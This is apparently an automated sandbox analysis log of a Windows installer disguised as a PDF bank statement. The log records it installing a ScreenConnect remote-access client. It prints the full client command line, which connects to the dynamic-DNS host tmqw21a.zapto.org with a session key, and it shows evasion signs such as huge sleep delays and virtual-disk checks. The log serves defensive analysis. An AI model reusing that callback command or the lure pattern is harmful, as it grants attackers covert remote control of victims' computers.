                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 19F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 3440000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 31E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 6B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 62C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 7B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 8B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 6B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 8E00000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: 9E00000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 1D90000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 1F10000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 3F10000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1320000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1AE90000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI73FE.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                      Source: C:\Windows\System32\svchost.exe TID: 2648Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe TID: 6624Thread sleep count: 43 > 30
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=tmqw21a.zapto.org&p=8041&s=2bb258fa-13a9-41c5-bd5b-67ab96b0c2b1&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&i=amazon"
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformation
